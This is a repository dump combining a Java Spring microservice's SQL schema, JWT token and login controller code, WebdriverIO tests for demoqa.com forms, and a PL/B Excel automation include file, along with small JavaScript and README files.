INSERT INTO `sys_user` VALUES ('f0019fdebedb443c98dcb17d88222c38', 'zhagnxiao', '张小红', 'uaaIHVXKz5plwekhq_yK6w', 'user/20190401/20180607175028Fn1Lq7zw_1554118444672.png', '2019-4-1 00:00:00', NULL, NULL, NULL, '研发部,财务部', 1, 0, NULL, NULL, 1, '00003', '', NULL, 'admin', '2023-10-1 19:34:10', 'admin', '2020-5-2 15:34:51', 1, '');
-- ----------------------------
-- Table structure for sys_log
-- ----------------------------
DROP TABLE IF EXISTS `sys_log`;
CREATE TABLE `sys_log` (
`id` varchar(32) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL,
`log_type` int(2) NULL DEFAULT NULL COMMENT '日志类型(1登录日志,2操作日志)',
`log_content` varchar(1000) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '日志内容',
`operate_type` int(2) NULL DEFAULT NULL COMMENT '操作类型',
`userid` varchar(32) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '操作用户账号',
`username` varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '操作用户名称',
`ip` varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT 'IP',
`method` varchar(500) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '请求java方法',
`request_url` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '请求路径',
`request_param` longtext CHARACTER SET utf8 COLLATE utf8_general_ci NULL COMMENT '请求参数',
`request_type` varchar(10) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '请求类型',
`cost_time` bigint(20) NULL DEFAULT NULL COMMENT '耗时',
`create_by` varchar(32) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '创建人',
`create_time` datetime(0) NULL DEFAULT NULL COMMENT '创建时间',
`update_by` varchar(32) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '更新人',
`update_time` datetime(0) NULL DEFAULT NULL COMMENT '更新时间',
PRIMARY KEY (`id`) USING BTREE,
INDEX `index_table_userid`(`userid`) USING BTREE,
INDEX `index_logt_ype`(`log_type`) USING BTREE,
INDEX `index_operate_type`(`operate_type`) USING BTREE,
INDEX `index_log_type`(`log_type`) USING BTREE
) ENGINE = MyISAM CHARACTER SET = utf8 COLLATE = utf8_general_ci COMMENT = '系统日志表' ROW_FORMAT = Dynamic;
<file_sep>/micro-cloud-security/src/main/java/com/cloud/security/TokenProvider.java
package com.cloud.security;
import cn.hutool.core.util.ObjectUtil;
import com.cloud.common.constant.CacheConstant;
import com.cloud.common.constant.CommonConstant;
import com.cloud.common.exception.MicroCloudException;
import com.cloud.config.JwtConfig;
import com.cloud.modules.system.entity.LoginUser;
import com.cloud.modules.utils.JwtUtil;
import com.cloud.modules.utils.RedisUtils;
import com.cloud.modules.utils.StringUtils;
import io.jsonwebtoken.*;
import io.jsonwebtoken.io.Decoders;
import io.jsonwebtoken.security.Keys;
import lombok.extern.slf4j.Slf4j;
import org.springframework.beans.factory.InitializingBean;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.security.authentication.UsernamePasswordAuthenticationToken;
import org.springframework.security.core.Authentication;
import org.springframework.security.core.GrantedAuthority;
import org.springframework.security.core.authority.SimpleGrantedAuthority;
import org.springframework.security.core.userdetails.User;
import org.springframework.stereotype.Component;
import javax.servlet.http.HttpServletRequest;
import java.security.Key;
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
import java.util.Date;
import java.util.stream.Collectors;
/**
* token的生成和验证
*
* InitializingBean:
* 1:spring在初始化bean的时候,如果bena实现了接口InitializingBean
* 则会自动调用afterPropertiesSet()方法
*/
@Slf4j
@Component
public class TokenProvider implements InitializingBean {
private static final String AUTHORITIES_KEY = "auth";
@Autowired
private RedisUtils redisUtils;
private Key key;
@Override
public void afterPropertiesSet() throws Exception {
byte[] keyBytes = Decoders.BASE64.decode(JwtConfig.BASE64SECRET);
this.key = Keys.hmacShaKeyFor(keyBytes);
}
/**
* 创建token
*/
public String createToken(Authentication authentication) {
String authorities = authentication.getAuthorities().stream()
.map(GrantedAuthority::getAuthority)
.collect(Collectors.joining(","));
long now = (new Date()).getTime();
Date validity = new Date(now + JwtConfig.TOKENVALIDITYINSECONDS);
return Jwts.builder()
.setSubject(authentication.getName())
.claim(AUTHORITIES_KEY,authorities)
.signWith(key, SignatureAlgorithm.HS512)
.setExpiration(validity) // 设置token过去时间
.compact();
}
/**
* 从token中获取到认证
*/
Authentication getAuthentication(String token) {
Claims claims = Jwts.parser()
.setSigningKey(key)
.parseClaimsJws(token)
.getBody();
Object authoritiesStr = claims.get(AUTHORITIES_KEY);
Collection<? extends GrantedAuthority> authorities =
ObjectUtil.isNotEmpty(authoritiesStr) ?
Arrays.stream(authoritiesStr.toString().split(","))
.map(SimpleGrantedAuthority::new)
.collect(Collectors.toList()) : Collections.emptyList();
User principal = new User(claims.getSubject(), "", authorities);
return new UsernamePasswordAuthenticationToken(principal, token, authorities);
}
/**
* token验证
*/
public boolean validateToken(String token){
try {
Jwts.parser().setSigningKey(key).parseClaimsJws(token);
return true;
}catch (MicroCloudException e) {
throw new MicroCloudException("token已过期");
}
}
/**
* 获取请求中的token
*/
public String getToken(HttpServletRequest request){
final String requestHeader = request.getHeader(JwtConfig.HEADER);
if (requestHeader != null && requestHeader.startsWith(JwtConfig.getTokenStartWith())) {
return requestHeader.substring(7);
}
return null;
}
/**
* 验证Token是否有效
*/
public Boolean checkUserTokenIsEffect(String token) throws MicroCloudException {
// 根据token 获取到账号
String username = JwtUtil.getUsername(token);
if(StringUtils.isBlank(username)){
throw new MicroCloudException("非法token");
}
// 获取到缓存中的用户
LoginUser loginUser = (LoginUser) redisUtils.get(CacheConstant.SYS_USERS_CACHE + ":" + token);
if(loginUser == null){
throw new MicroCloudException("用户不存在");
}
// 判断当前用户的状态
if(loginUser.getStatus() != 1){
throw new MicroCloudException("账号已被锁定,请联系管理员");
}
// 验证token是否超时 & 账号和密码是否正确 & 刷新token 刷新token(用户在线操作不掉线功能)
if(!this.jwtTokenRefresh(token,username,loginUser.getPassword())){
throw new MicroCloudException("Token失效请,重新登录");
}
return true;
}
/**
* 刷新Token(保证在线用户操作不掉线功能)
* 1:登录成功将JWT生层的token 作为key value 保存到cache缓存里面,缓存的有效时间设置为JWT有效时间2倍
* 2:当用户在请求是,通过自定义过滤器层层校验后进入到身份验证(doGetAuthenticationInfo)
* 3:当用户再次请求时,如果JWT生成token已超时,但token对应的缓存还存在,则表示用户在一直操作,只是JWT的token过期了
* 则程序会给给token对应key映射的value重新生成JWTToken并且覆盖value,缓存生命周期重新计算
* 4:当用户再次请求时,如果JWT生成token已超时,并cache缓存中的token也超时,则表示该账户已超时,返回信息失效,重新登录
*/
public boolean jwtTokenRefresh(String token, String userName, String passWord){
// 从缓存中获取token
String cacheToken = String.valueOf(redisUtils.get(CommonConstant.PREFIX_USER_TOKEN + token));
// 如果缓存中token已过期,返回false 账号已过期 重新登录
if(StringUtils.isNotBlank(cacheToken)){
// 验证token是否有效 过期
if(!JwtUtil.verify(token,userName,passWord)){
log.info("---------------------用户在线操作, 更新token保证不掉线----------------------");
// 生成新的 token
String newToken = JwtUtil.sign(userName, passWord);
// 更新缓存超时时间
redisUtils.set(CommonConstant.PREFIX_USER_TOKEN + newToken,newToken);
redisUtils.expire(CommonConstant.PREFIX_USER_TOKEN + newToken,JwtUtil.EXPIRE_TIME * 2 /1000);
}
return true;
}
return false;
}
}
<file_sep>/micro-cloud-system/src/main/java/com/cloud/modules/system/controller/LoginController.java
package com.cloud.modules.system.controller;
import cn.hutool.core.util.IdUtil;
import cn.hutool.core.util.RandomUtil;
import com.alibaba.fastjson.JSONObject;
import com.cloud.annotation.AnonymousAccess;
import com.cloud.annotation.AutoLog;
import com.cloud.common.api.Result;
import com.cloud.common.constant.CacheConstant;
import com.cloud.common.constant.CommonConstant;
import com.cloud.modules.shiro.vo.DefContants;
import com.cloud.modules.system.entity.SysUser;
import com.cloud.modules.system.model.SysLoginModel;
import com.cloud.modules.system.service.ISysUserService;
import com.cloud.modules.system.entity.LoginUser;
import com.cloud.modules.utils.JwtUtil;
import com.cloud.modules.utils.RedisUtils;
import com.cloud.modules.utils.StringUtils;
import com.cloud.modules.utils.encryption.AesEncryptUtil;
import io.swagger.annotations.Api;
import io.swagger.annotations.ApiOperation;
import lombok.extern.slf4j.Slf4j;
import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authz.annotation.RequiresGuest;
import org.springframework.beans.BeanUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.web.bind.annotation.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.validation.Valid;
import java.util.HashMap;
import java.util.Map;
@Slf4j
@RestController
@RequestMapping("sys")
@Api(tags = "用户登录")
public class LoginController {
/**
* 验证码key 用于生成UUID
*/
@Value("${jwt.code-key}")
private String codeKey;
@Autowired
private RedisUtils redisUtils;
@Autowired
private ISysUserService userService;
private static final String BASE_CHECK_CODES = "qwertyuiplkjhg<KEY>";
/**
* 登录接口
*/
@PostMapping("/login")
@ApiOperation("登录接口")
public Result<JSONObject> login(@RequestBody @Valid SysLoginModel sysLoginModel){
Result<JSONObject> res = new Result<>();
String username = sysLoginModel.getUsername();
String password = sysLoginModel.getPassword();
// 前端对密码进行加密 后端进行解密(先忽略)
String captcha = sysLoginModel.getCaptcha();
String checkCode = (String) redisUtils.get(sysLoginModel.getUuid());
// 清除验证码, 保证一个请求 只有一个验证码
redisUtils.del(sysLoginModel.getUuid());
// Assert.isNull(checkCode,"验证码不存在或者已过期");
if(StringUtils.isBlank(checkCode)){
res.error500("验证码不存在或者已过期");
return res;
}
// 忽略大小写
if(!captcha.equalsIgnoreCase(checkCode)){
res.error500("验证码错误");
return res;
}
// 检查账户是否有效
SysUser sysUser = userService.getUserByName(username);
Result result = userService.checkUserIsEffective(sysUser);
if(!result.isSuccess()){
return result;
}
// 检查账户 & 密码是否正确
String encryptPassword = "";
try {
encryptPassword = AesEncryptUtil.encrypt(password);
} catch (Exception e) {
e.printStackTrace();
}
// String encryptPassword = PasswordUtil.encrypt(username, password, sysUser.getSalt());
if(!encryptPassword.equals(sysUser.getPassword())){
res.error500("用户名或者密码错误");
return res;
}
userInfo(sysUser,res);
return res;
}
/**
* 退出登录
*/
@GetMapping("/logout")
@ApiOperation("退出登录")
public Result<Object> logout(HttpServletRequest request, HttpServletResponse response){
// 获取到token
String token = request.getHeader(DefContants.X_ACCESS_TOKEN);
if(StringUtils.isBlank(token)){
return Result.error("退出失败");
}
// 获取到token中的用户名
String username = JwtUtil.getUsername(token);
SysUser user = userService.getUserByName(username);
if(user != null){
// 清空当前登录人token
redisUtils.del(CommonConstant.PREFIX_USER_TOKEN + token);
redisUtils.del(CacheConstant.SYS_USERS_CACHE + ":" + token);
// 调用shiro退出
SecurityUtils.getSubject().logout();
return Result.error("退出成功");
}else {
return Result.error("Token 无效 退出失败");
}
}
/**
* 后台生成图像验证码 ResponseEntity
*/
@ApiOperation("获取验证码")
@GetMapping("/randomImage")
public Result<Map<String,Object>> randomImage(HttpServletRequest request, HttpServletResponse response){
Result res = new Result();
try {
String code = RandomUtil.randomString(BASE_CHECK_CODES,4);
// 讲字符串转小写
String lowerCaseCode = code.toLowerCase();
// 使用 uuid 作为验证码的唯一标识
String uuid = codeKey + IdUtil.simpleUUID();
// String realKey = MD5Util.MD5Encode(lowerCaseCode + key, "utf-8");
// 验证码60S过期
redisUtils.set(uuid, lowerCaseCode, 60);
HashMap<String, Object> map = new HashMap<String, Object>(2) {{
put("img", code);
put("uuid",uuid);
}};
res.setSuccess(true);
res.setResult(map);
}catch (Exception e){
e.printStackTrace();
res.error500("获取验证码错误" + e.getMessage());
}
return res;
}
/**
* 用户信息 以及Token生成
*/
private Result<JSONObject> userInfo(SysUser sysUser, Result<JSONObject> res){
// 根据用户名密码生成Token
String token = JwtUtil.sign(sysUser.getUsername(), sysUser.getPassword());
// 设置Token缓存有效时间
redisUtils.set(CommonConstant.PREFIX_USER_TOKEN + token,token);
redisUtils.expire(CommonConstant.PREFIX_USER_TOKEN + token, JwtUtil.EXPIRE_TIME * 2 / 1000);
// 缓存当前在线用户
LoginUser loginUser = new LoginUser();
BeanUtils.copyProperties(sysUser,loginUser);
redisUtils.set(CacheConstant.SYS_USERS_CACHE + ":" + token,loginUser);
redisUtils.expire(CacheConstant.SYS_USERS_CACHE + ":" + token, JwtUtil.EXPIRE_TIME * 2 / 1000);
JSONObject obj = new JSONObject();
obj.put("token", token);
obj.put("userInfo", loginUser);
res.setResult(obj);
res.setMessage("登录成功");
return res;
}
@AnonymousAccess
@GetMapping("/add")
@AutoLog("测试EFK")
@ApiOperation("测试匿名访问 访问接口")
public Result<?> testAnonymousAccess(){
int a = 1 / 0;
System.out.println(a);
Result<Object> res = new Result<>();
res.setSuccess(true);
res.setResult("测试匿名访问 访问接口");
return res;
}
@GetMapping("/test111")
@ApiOperation("sdfdafdaf")
public Result<?> testRedis(HttpServletRequest request){
Result<Object> res = new Result<>();
String token = request.getHeader(DefContants.X_ACCESS_TOKEN);
return res;
}
}
<file_sep>/micro-cloud-common/src/main/java/com/cloud/feign/SysLogFeignClient.java
package com.cloud.feign;
import com.alibaba.fastjson.JSONObject;
import com.cloud.common.api.Result;
import com.cloud.feign.fallback.SysLogFeignClientFallback;
import org.springframework.cloud.openfeign.FeignClient;
import org.springframework.stereotype.Component;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
@Component
@FeignClient(contextId = "sysLogFeignClient",value = "micro-cloud-system",fallback = SysLogFeignClientFallback.class)
public interface SysLogFeignClient {
/**
* 保存日志
*/
@PostMapping("/sys/log/save")
Result<?> saveSysLog(@RequestBody JSONObject jsonObject);
}
<file_sep>/micro-cloud-system/src/main/java/com/cloud/modules/system/service/impl/SysLogServiceImpl.java
package com.cloud.modules.system.service.impl;
import com.baomidou.mybatisplus.extension.service.impl.ServiceImpl;
import com.cloud.modules.system.mapper.SysLogMapper;
import com.cloud.modules.system.service.ISysLogService;
import com.cloud.modules.system.entity.SysLog;
import org.springframework.stereotype.Service;
@Service
public class SysLogServiceImpl extends ServiceImpl<SysLogMapper, SysLog> implements ISysLogService {
}
| 1280740b572487ab361015c1e524b2073a552415 | [
"Java",
"Maven POM",
"SQL",
"INI"
] | 23 | INI | tang-shao/tang-shao-micro-cloud | 0b256347b15731f52cf42ed2f4fce876b8d89785 | 63f43cfe7f2e517bb98a97bfae4b154db3000e50 |
refs/heads/master | <repo_name>Darhan2020/-NY-Project<file_sep>/Automation/pageObjects/webTable.js
class WebTable {
get btnAdd() {
return $("#addNewRecordButton");
}
get modal() {
return $(".modal-content");
}
get modalHeader() {
return $("#registration-form-modal").getText();
}
get firstName() {
return $("#firstName");
}
get lastName() {
return $("#lastName");
}
get userEmail() {
return $("#userEmail");
}
get age() {
return $("#age");
}
get salary() {
return $("#salary");
}
get department() {
return $("#department");
}
get allFields() {
return [
this.firstName,
this.lastName,
this.userEmail,
this.age,
this.salary,
this.department,
];
}
get btnSubmit() {
return $("#submit");
}
get inputFirstName() {
return $("#firstName");
}
get inputFirstNamePlaceholder() {
return this.inputFirstName.getAttribute("placeholder");
}
get inputLastName() {
return $("#lastName");
}
get inputLastNamePlaceholder() {
return this.inputLastName.getAttribute("placeholder");
}
get inputEmail() {
return $("#userEmail");
}
get inputEmailPlaceholder() {
return this.inputEmail.getAttribute("placeholder");
}
get inputAge() {
return $("#age");
}
get inputAgePlaceholder() {
return this.inputAge.getAttribute("placeholder");
}
get inputSalary() {
return $("#salary");
}
get inputSalaryPlaceholder() {
return this.inputSalary.getAttribute("placeholder");
}
get inputDepartment() {
return $("#department");
}
get inputDepartmentPlaceholder() {
return this.inputDepartment.getAttribute("placeholder");
}
}
export default new WebTable();
<file_sep>/Automation/test/specs/webTables.js
const expect = require("chai").expect;
import {URLs, webPlaceholders} from "../../expect";
import WebTable from "../../pageObjects/webTable";
describe('Validate Web Tables section', () => {
it('Click on add button and check if new modal apprars', () => {
browser.url(URLs.webTable);
if(!WebTable.btnAdd.isDisplayedInViewport())WebTable.btnAdd.scrollIntoView();
WebTable.btnAdd.click();
WebTable.modal.waitForExist({timeout:5000});
expect(WebTable.modal.isExisting()).to.be. true;
expect(WebTable.modalHeader).to.equal("Registration Form");
});
it('Validate all fields are required', () => {
for(let el of WebTable.allFields){
expect(el.getProperty('required')).to.be.true;
}
});
it('Validate placeholder of all fields', () => {
expect(WebTable.inputFirstNamePlaceholder).to.equal(webPlaceholders.firstName);
expect(WebTable.inputLastNamePlaceholder).to.equal(webPlaceholders.lastName);
expect(WebTable.inputAgePlaceholder).to.equal(webPlaceholders.age);
expect(WebTable.inputEmailPlaceholder).to.equal(webPlaceholders.email);
expect(WebTable.inputDepartmentPlaceholder).to.equal(webPlaceholders.department);
expect(WebTable.inputSalaryPlaceholder).to.equal(webPlaceholders.salary);
});
});<file_sep>/Automation/pageObjects/practiceForm.js
class PracticeForm {
get labelHeader(){
return $$("#app > div > div > div.pattern-backgound.playgound-header > div")[0].getText();
}
get labelName() {
return $("#userName-label").getText();
}
get labelEmail() {
return $("#userEmail-label").getText();
}
get labelGender() {
return $$("#genterWrapper > div.col-md-3.col-sm-12")[0].getText();
}
get labelMobileNumber() {
return $("#userNumber-label").getText();
}
get labelDateOfBirth() {
return $("#dateOfBirth-label").getText();
}
get labelSubjects() {
return $$("#subjects-label")[0].getText();
}
get labelHobbies() {
return $$("#subjects-label")[1].getText();
}
get labelPicture() {
return $$("#subjects-label")[2].getText();
}
get labelCurrentAddress() {
return $("#currentAddress-label").getText();
}
get labelStateAndCity() {
return $("#stateCity-label").getText();
}
get hobbiesSports() {
return $("#hobbies-checkbox-1");
}
get hobbiesReading() {
return $("#hobbies-checkbox-2");
}
get hobbiesMusic() {
return $("#hobbies-checkbox-3");
}
get inputFirstName() {
return $("#firstName");
}
get inputFirstNamePlaceholder() {
return this.inputFirstName.getAttribute("placeholder");
}
get inputLastName() {
return $("#lastName");
}
get inputLastNamePlaceholder() {
return this.inputLastName.getAttribute("placeholder");
}
get inputEmail() {
return $("#userEmail");
}
get inputEmailPlaceholder() {
return this.inputEmail.getAttribute("placeholder");
}
get inputMobile() {
return $("#userNumber");
}
get inputMobilePlaceholder() {
return this.inputMobile.getAttribute("placeholder");
}
get inputCurrentAddress() {
return $("#currentAddress");
}
get inputCurrentAddressPlaceholder() {
return this.inputCurrentAddress.getAttribute("placeholder");
}
fillForm(obj) {
this.inputFirstName.setValue(obj.firstName);
this.inputLastName.setValue(obj.lastName);
this.inputEmail.setValue(obj.email);
this.inputMobile.setValue(obj.mobile);
this.inputCurrentAddress.setValue(obj.currentAddress);
}
get btnSubmit() {
return $("#submit");
}
}
export default new PracticeForm();
<file_sep>/Automation/test/specs/practiceForm.js
const expect = require("chai").expect;
import {textBoxLabels , checkBoxHobbies, registrationFormPlaceholders, studentRegistrationForm} from "../../expect";
import PracticeForm from "../../pageObjects/PracticeForm";
import {inputRegistrationForm} from "../../input";
describe('Validate Practice Form section', () => {
it('Validate the Labels in Text Box area', () => {
browser.maximizeWindow();
browser.url("https://demoqa.com/automation-practice-form");
expect(PracticeForm.labelHeader).to.equal(textBoxLabels.header);
expect(PracticeForm.labelName).to.equal(textBoxLabels.name);
expect(PracticeForm.labelEmail).to.equal(textBoxLabels.email);
expect(PracticeForm.labelGender).to.equal(textBoxLabels.gender);
expect(PracticeForm.labelMobileNumber).to.equal(textBoxLabels.mobile);
expect(PracticeForm.labelDateOfBirth).to.equal(textBoxLabels.dob);
expect(PracticeForm.labelSubjects).to.equal(textBoxLabels.subjects);
expect(PracticeForm.labelHobbies).to.equal(textBoxLabels.hobbies);
expect(PracticeForm.labelPicture).to.equal(textBoxLabels.picture);
expect(PracticeForm.labelCurrentAddress).to.equal(textBoxLabels.currentAddress);
expect(PracticeForm.labelStateAndCity).to.equal(textBoxLabels.stateAndCity);
});
it('Validate checkbox Hobbies', () => {
if (!PracticeForm.hobbiesSports.isDisplayedInViewport()) PracticeForm.hobbiesSports.scrollIntoView();
PracticeForm.hobbiesSports.nextElement().click();
PracticeForm.hobbiesReading.nextElement().click();
PracticeForm.hobbiesMusic.nextElement().click();
expect(PracticeForm.hobbiesSports.nextElement().getText()).to.equal(checkBoxHobbies.sports);
expect(PracticeForm.hobbiesReading.nextElement().getText()).to.equal(checkBoxHobbies.reading);
expect(PracticeForm.hobbiesMusic.nextElement().getText()).to.equal(checkBoxHobbies.music);
});
it('Validate Student Registration Form placeholders', () => {
expect(PracticeForm.inputFirstNamePlaceholder).to.equal(registrationFormPlaceholders.firstName);
expect(PracticeForm.inputLastNamePlaceholder).to.equal(registrationFormPlaceholders.lastName);
expect(PracticeForm.inputEmailPlaceholder).to.equal(registrationFormPlaceholders.email);
expect(PracticeForm.inputMobilePlaceholder).to.equal(registrationFormPlaceholders.mobile);
expect(PracticeForm.inputCurrentAddressPlaceholder).to.equal(registrationFormPlaceholders.currentAddress);
});
it('Fill Student Registration Form with Random data and submit', () => {
let myObj = inputRegistrationForm();
console.log(myObj);
PracticeForm.fillForm(myObj);
browser.pause(3000);
PracticeForm.btnSubmit.click();
browser.pause(3000);
});
// it('Fill Student Registration Form with Random data and submit', () => {
// expect(PracticeForm.inputFirstNamePlaceholder).to.equal(studentRegistrationForms.firstName);
// expect(PracticeForm.inputLastNamePlaceholder).to.equal(studentRegistrationForm.lastName);
// expect(PracticeForm.inputEmailPlaceholder).to.equal(studentRegistrationForm.email);
// expect(PracticeForm.inputMobilePlaceholder).to.equal(studentRegistrationForm.mobile);
// expect(PracticeForm.inputCurrentAddressPlaceholder).to.equal(studentRegistrationForm.current);
});
<file_sep>/CodeWars/HW.js
let obj = {
arr: [],
print: function () {
console.log(this.arr.filter((el) => el % 2 === 0));
},
initiate(x, y) {
this.x = 4;
this.y = 5;
},
sum: function () {
return this.x + this.y;
},
min: function () {
return Math.min(...this.arr);
},
grow: function () {
this.arr.sort((a, b) => a - b);
},
};
obj.arr.push(1, 2, 5, 6, 8, 9);
obj.print();
<file_sep>/Automation/expect.js
export const textBoxLabels = {
header: "Practice Form",
name: "Name",
email: "Email",
gender: "Gender",
mobile: "Mobile(10 Digits)",
dob: "Date of Birth",
subjects: "Subjects",
hobbies: "Hobbies",
picture: "Picture",
currentAddress: "Current Address",
stateAndCity: "State and City",
}
export const checkBoxHobbies = {
sports:"Sports",
reading:"Reading",
music:"Music",
}
export const URLs = {
elements: "https://demoqa.com/elements",
forms : "https://demoqa.com/forms",
alertsWindows : "https://demoqa.com/alertsWindows",
widgets : "https://demoqa.com/widgets",
interaction: "https://demoqa.com/interaction",
books: "https://demoqa.com/books",
textBox: "https://demoqa.com/text-box",
mainPage: "https://demoqa.com",
checkbox: "https://demoqa.com/checkbox",
radioButton: "https://demoqa.com/radio-button",
webTable: "https://demoqa.com/webtables"
}
// export const radioButtons = {
// header : "Radio Button",
// }
export const webPlaceholders = {
firstName:"<NAME>",
lastName: "<NAME>",
email: "<EMAIL>",
age: "Age",
salary:"Salary",
department: "Department"
}
export const registrationFormPlaceholders = {
firstName:"<NAME>",
lastName: "<NAME>",
email: "<EMAIL>",
mobile: "Mobile Number",
currentAddress:"Current Address",
}
export const studentRegistrationForm = {
firstName:"<NAME>",
lastName: "<NAME>",
email: "<EMAIL>",
mobile: "Mobile(10 Digits)",
currentAddress:"Current Address",
}
<file_sep>/Automation/input.js
const random = require("generate-random-data");
export function inputRegistrationForm() {
return {
firstName: random.maleFirstName(),
lastName: random.femaleFirstName(),
email: random.email("gmail.com"),
mobile: random.mobile(),
currentAddress: random.sentence(20,50)
};
}
| 29b3bfa318dade6f5dd69c2d9ad364edf57c7bfc | [
"JavaScript"
] | 7 | JavaScript | Darhan2020/-NY-Project | 81d3185c8f3dae6e6dfffedde8608a78e4166655 | 6f7b27d745ea780501863a996215da2c5fae6e1f |
refs/heads/main | <repo_name>stopdaydreaming/bossgirl-day-planner<file_sep>/assets/script.js
$(document).ready(function() {
var todaysDate = $("#currentDay");
todaysDate.text(moment().format("dddd, MMMM, Do YYYY"));
var currHour = moment().hours();
var timeOfDay = [9, 10, 11, 12, 13, 14, 15, 16, 17];
for (var i = 0; i < timeOfDay.length; i++) {
var row = $("<div>");
row.addClass("row time-block");
var hour = $("<div>");
var hourDisplay = moment()
.set("hour", timeOfDay[i])
.format("hA");
hour.text(hourDisplay);
hour.addClass("hour col-1 mt-1");
row.append(hour);
var textArea = $("<textarea>");
textArea.val(localStorage.getItem(hourDisplay));
textArea.addClass("past description col-10");
row.append(textArea);
var button = $("<button>");
button.append('<i class="fas fa-save fa-md"></i>');
button.addClass("saveBtn col-1");
button.on("click", saveEvent);
row.append(button);
$(".container").append(row);
if (timeOfDay[i] === currHour) {
textArea.addClass("present");
} else if (timeOfDay[i] < currHour) {
textArea.addClass("past");
} else {
textArea.addClass("future");
}
}
function saveEvent() {
var hour = $(this)
.siblings(".hour")
.text();
var textArea = $(this)
.siblings(".description")
.val();
localStorage.setItem(hour, textArea);
}
});<file_sep>/README.md
# Boss Girl Day Planner 💅
## Description
A simple calendar application that allows a user to save events for each hour of the day.
## Table of Contents
* [Installation](#installation)
* [Usage](#usage)
* [Credits](#credits)
* [License](#license)
* [Features](#features)
* [Contributing](#contributing)
* [Tests](#tests)
* [Badges](#badges)
## Installation
### Steps required to run locally
1. Clone/download the code in this repo
2. Navigate to the location of the code downloaded
3. Double-click on the html file provided in the downloaded code to preview
### Steps required to run online
1. Click the "VIEW SITE" link at the bottom of this README
## Usage
This code should be used for the purpose of creating/editing code for a simple calendar application.

## View Website
Click here to view the live website [VIEW SITE](https://stopdaydreaming.github.io/bossgirl-day-planner/)
## Credits
1 contributor: @stopdaydreaming
Special thanks to the study groups
## License
Copyright (c) Boss Girl Day Planner. All rights reserved.
Licensed under the [MIT](license.txt) license.
## Features
None at this time
## Contributing
None at this time
## Tests
None at this time
## Badges






 | 4e7634fe473d5fcc8ccfc74242585b9b1e5149a2 | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | stopdaydreaming/bossgirl-day-planner | 6d4dcd87a9c2215f0d4ba787c6b4e78abd61e8c2 | 0ea9821668ed0156b53c27ac0bd6415cbe12b667 |
refs/heads/master | <repo_name>wobbly/NINCAL<file_sep>/include/xls.inc
.Variant Types0
VT_EMPTY EQU 0 .nothing
VT_NULL EQU 1 .SQL style null
VT_I2 EQU 2 .2 byte signed integer
VT_I4 EQU 3 .4 byte signed integer
VT_R4 EQU 4 .4 byte real - Float
VT_R8 EQU 5 .8 byte real - Double
VT_CY EQU 6 .Currency
VT_DATE EQU 7 .Date
VT_BSTR EQU 8 .OLE automation string
VT_DISPATCH EQU 9 .Idispatch FAR *
VT_ERROR EQU 10 .SCODE
VT_BOOL EQU 11 .Boolean - True = -1, False = 0
VT_VARIANT EQU 12 .VARIANT FAR *
VT_UNKNOWN EQU 13 .Unknown type
VT_UI1 EQU 17 .Unsigned character
VT_ARRAY EQU 0x2000 .Variant Array
. Modified 06/13/08 to allow more rows --- DH
.//In order to use any of the properties/methods associated with all parent objects
.//of the Worksheet, I need to create automation objects for each of them.
.//
.//Look at Excel Object Model to understand heirarchy. This can be found in hard
.//documentation: Microsoft Office 2000 Object Model Guide (found in MS Office 2000 Developers Edition).
.//Software available via PL/B Designer - create a Container object on a form, create an Excel
.//Spreadsheet, right click on Container object and Browse object. This will invoke the PL/B Object
.//Browser, which will give you SOME of the components of the Object Model. To browse the Object
.//Model in its entirety, open Excel. Under Tools menu select Macro, select Visual Basic Editor.
.//In the Visual Basic Editor screen, under the View menu, select Object Browser. There you can
.//view all of the objects/methods/properties in Excel. Right clicking on an item will give you
.//option to locate Help topics to see specifics.
.//
.//General heirarchy:
.// Excel Application
ex AUTOMATION class="Excel.Application"
.// Workbooks Collection (all open Workbooks)
books AUTOMATION
.// Single Workbook
book AUTOMATION
.// Worksheets Collection (all Worksheets in this Workbook)
sheets AUTOMATION
.// Single Worksheet
sheet AUTOMATION
sheet1 AUTOMATION
.// SortColumn (a Single Column in that Worksheet used for sorting)
sortcol AUTOMATION
sortcol1 AUTOMATION
.// Range within a worksheet
exrange AUTOMATION
PivotCaches AUTOMATION
PivotCache AUTOMATION
PivotTable AUTOMATION
DataFields AUTOMATION
DataField AUTOMATION
........................
.//bars automation
.//bar automation
.//menubar INTEGER 2,"0x00000006"
.......................
HPageBreaks AUTOMATION
HPageBreak AUTOMATION
.//Variable for use in spreadsheet
OTRUE VARIANT
OFALSE VARIANT
.//Zoom allows you to adjust the size of the data within a sheet in order to allow certain information to appear within a sheet.
Zoom85 VARIANT
Zoom80 VARIANT
Zoom75 VARIANT
Zoom70 VARIANT
Zoom65 VARIANT
Zoom60 VARIANT
Zoom55 VARIANT
VT_R8A EQU 5 .Double - 8 byte Real
.//A general width for columns - more may be added within your own program
xlColumnWidth VARIANT
.//Margins of a page
TopMargin VARIANT
BottomMargin VARIANT
LeftMargin VARIANT
RightMargin VARIANT
.//The thickness of a line
xlBorderWeightMedium VARIANT
.//Manually sets the page break when excel does not
xlPageBreakManual VARIANT
.//Have not used this yet
xlPageBreakAutomatic VARIANT
.//Index of a worksheet
SheetIndex VARIANT
TimePeriod VARIANT
xlCenter VARIANT
.//Average row height is 12 in 2003 15 in 2007
xlRowHeight VARIANT
.//Formatting vars needed
